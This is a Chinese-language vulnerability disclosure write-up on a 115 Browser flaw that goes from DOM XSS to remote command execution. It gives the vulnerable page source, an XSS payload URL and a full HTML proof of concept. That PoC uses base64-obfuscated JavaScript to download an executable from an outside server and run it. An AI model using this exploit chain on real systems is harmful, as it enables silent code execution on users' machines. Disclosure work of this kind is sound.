点我的链接就能弹你一脸计算器

admin

比较经典的国产浏览器“特权域”问题，115 浏览器从 DOMxss 到远程命令执行漏洞，目前官方已修复。

0x01 DownProxy XSS

view-source: http://m.115.com/down_proxy.html

1. function localParam(search, hash) {
   
2.     search = search || window.location.search;
   
3.     hash = hash || window.location.hash;
   
4.     var fn = function (str, reg) {
   
5.         if (str) {
   
6.             var data = {};
   
7.             str.replace(reg, function ($0, $1, $2, $3) {
   
8.                 data[ $1 ] = $3;
   
9.             });
   
10.             return data;
    
11.         }
    
12.     }
    
13.     return {search: fn(search, new RegExp("([^?=&]+)(=([^&]*))?", "g")) || {},
    
14.         hash: fn(hash, new RegExp("([^#=&]+)(=([^&]*))?", "g")) || {}};
    
15. }
    
16. 
    
17. var isAndroid = navigator.userAgent.match(/android/ig),
    
18.     isIos = navigator.userAgent.match(/iphone|ipod/ig),
    
19.     isIpad = navigator.userAgent.match(/ipad/ig),
    
20.     isWeixin = (/MicroMessenger/ig).test(navigator.userAgent),
    
21.     params = localParam(),
    
22.     docid = params.search['docid'],
    
23.     isappinstalled = params.search['isappinstalled'] || params.search['appinstall'],
    
24.     openurl = (params.search['openurl'] ? params.search['openurl'] : false),
    
25.     gotourl = (params.search['goto'] ? decodeURIComponent(params.search['goto']) : false),
    
26.     gotokey = (params.search['key'] ? params.search['key'] : false),
    
27.     gotovalue = (params.search['val'] ? decodeURIComponent(params.search['val']) : false),
    
28.     gotodep = (params.search['tid'] ? decodeURIComponent(params.search['tid']) : false),
    
29.     iframe = document.getElementById('ifr'),
    
30.     iframe2 = document.getElementById('ifr2'),
    
31.     showurl = params.search['showurl'];
    
32. openurl = openurl || 'oof.disk://';
    
33. 
    
34. if(gotokey){
    
35.     openurl = 'oof.disk://' + gotokey;
    
36.     if(gotovalue){
    
37.         openurl += "/" + gotovalue;
    
38.     }
    
39.     if(gotodep){
    
40.         openurl +=  "/" + gotodep;
    
41.     } }
    
42. 
    
43. window.onload = function () {
    
44.     if (!isWeixin) {
    
45.         if(isAndroid){
    
46.             if(showurl){
    
47.                 window.location.href = decodeURIComponent(showurl);
    
48.                 return;
    
49.             }
    
50.         }
    
51.         iframe.src = openurl;
    
52.         setTimeout(function () {
    
53.             if(gotourl){
    
54.                 window.location.href = gotourl;
    
55.             }
    
56.             else{
    
57.                 if ((isIos || isIpad) && !isAndroid) {
    
58.                     window.location.href =
    
59.                         "https://itunes.apple.com/us/app/115wang-pan/id647500047?mt=8";
    
60.                     window.setTimeout(function(){window.location.href =
    
61.                         'http://a.app.qq.com/o/simple.jsp?pkgname=com.ylmf.androidclient';}, 1000);
    
62.                 } else if (isAndroid) {

复制代码

其中 iframe.src -> openurl -> params.search 环节出现问题，导致可使用伪协议嵌入 iframe 造成 XSS 漏洞：

params = localParam(),

openurl = (params.search['openurl'] ? params.search['openurl'] : false),

openurl = openurl \|\| 'oof.disk://';

iframe.src = openurl;

Payload: http://m.115.com/down_proxy.html?openurl=javascript:alert(document.domain)

0x02 FINDAPI

for(i in downloadInterface){console.log(i)}

    VM227:2 getLiXianIngUrls

    VM227:2 getLiXianUnFinishedUrls

    VM227:2 deleteLiXianUnFinishedUrl

    VM227:2 switchToOfflineWin

    VM227:2 createBTTaskForWeb

    VM227:2 beginDownload

    VM227:2 cancelOfflineDownload

    VM227:2 createOfflineDown

    VM227:2 getOfflineErrorInfo

    VM227:2 deleteOfflineErrorInfo

    VM227:2 GetTaskList

    VM227:2 ContinueDownload

    VM227:2 PauseDownload

    VM227:2 RemoveDownload

    VM227:2 RunDownloadItem

    VM227:2 OpenFolderItem

    VM227:2 StartAllDownloads

    VM227:2 PauseAllDownloads

    VM227:2 ClearHasFinished

    VM227:2 ShowDefaultFolder

    VM227:2 EnableShutdown

    VM227:2 GetDownloadErrorList

    VM227:2 ShowNewDownloadTaskWindow

    VM227:2 OpenURL

测试可知使用 OpenURL(URL) 传入二进制文件网址时则会自动下载文件到浏览器设置的下载文件夹内，随后使用 RunDownloadItem 打开，通过查看 RunDownloadItem 的原型可以知道：

function(id) {  native function NativeRunDownloadItem();  return NativeRunDownloadItem(id);}  

需要传入任务 ID 才能够运行下载的项目，所以这里我们使用 ClearHasFinished() 移除掉已经下载文件的记录然后遍历小范围的数字传参即可。

0x03 POC

1. <!DOCTYPE HTML>
   
2. <html>
   
3. <head>
   
4.     <title>115 Browser version 7.2.5.15 RCE</title>
   
5.     <meta charset="utf8"/>
   
6. </head>
   
7. <body>
   
8. <h1>115 Browser 7.* RCE Vulnerability</h1>
   
9. 
   
10. 
    
11. {gfm-js-extract-pre-1}
    
12. <img style="margin-top: 10px;" width=490 src="https://ws1.sinaimg.cn/large/c334041bgw1fax1c9wjb0j21c810gwl2.jpg"/>
    
13. //
    
14. w=window.parent.downloadInterface;w.ClearHasFinished();w.OpenURL('http://server.n0tr00t.com/calc.exe');window.parent.setTimeout(function(){for(var
    
15. i=0;i<300;i++){w.RunDownloadItem(i);}},5000);
    
16. <iframe src="http://m.115.com/down_proxy.html?openurl=javascript:eval(window.parent.location.hash.substr(1))#eval(atob('dz13aW5kb3cucGFyZW50LmRvd25sb2FkSW50ZXJmYWNlO3cuQ2xlYXJIYXNGaW5pc2hlZCgpO3cuT3BlblVSTCgnaHR0cDovL3NlcnZlci5uMHRyMDB0LmNvbS9jYWxjLmV4ZScpO3dpbmRvdy5wYXJlbnQuc2V0VGltZW91dChmdW5jdGlvbigpe2Zvcih2YXIgaT0wO2k8MzAwO2krKyl7dy5SdW5Eb3dubG9hZEl0ZW0oaSk7fX0sNTAwMCk7'))"
    
17.         style="display:none"></iframe>
    
18. </body>
    
19. </html>

复制代码

Discloure Timeline

2016/12/19 Report vuln detail to 115.

2016/12/24 M.115.com xss fix.

2016/12/25 The DownloadAPI update is expected to be released after the new year.

2016/12/26 Public, via @evi1m0.

Reference

https://www.seebug.org/vuldb/ssvid-92585